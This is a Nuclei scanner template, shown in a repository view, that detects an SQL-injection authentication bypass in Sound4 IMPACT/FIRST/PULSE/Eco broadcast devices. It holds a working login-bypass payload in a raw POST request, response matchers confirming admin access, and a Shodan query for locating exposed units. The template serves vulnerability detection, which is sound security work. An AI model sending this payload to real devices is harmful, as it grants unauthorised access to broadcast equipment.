nuclei-templates/http/vulnerabilities/other/sound4-impact-password-auth...

37 lines
1.3 KiB
YAML
Raw Normal View History

2023-10-17 07:20:28 +00:00
id: sound4-password-auth-bypass
info:
name: Sound4 IMPACT/FIRST/PULSE/Eco <=2.x - Authentication Bypass
author: r3Y3r53
severity: high
description: |
The application suffers from an SQL Injection vulnerability. Input passed through the 'password' POST parameter in 'index.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the authentication mechanism.
reference:
- https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5727.php
metadata:
verified: true
max-request: 1
2023-10-17 07:20:28 +00:00
shodan-query: http.html:"SOUND4"
tags: sound4,auth-bypass,sqli,misconfig
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=test&password=%27%2Bjoxy--%2Bz
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body, "SOUND4 PULSE", "Network Diagnostic", "Disconnect")'
- 'contains(content_type, "text/html")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c8013b6bb166aaf61813a0fe347efafc52eec3d652fda4d1231c638d38417b2102202d1afc18fcd4c257b18a66766d67df140cac910d7a67fd38915497328aa64dae:922c64590222798bb761d5b6d8e72950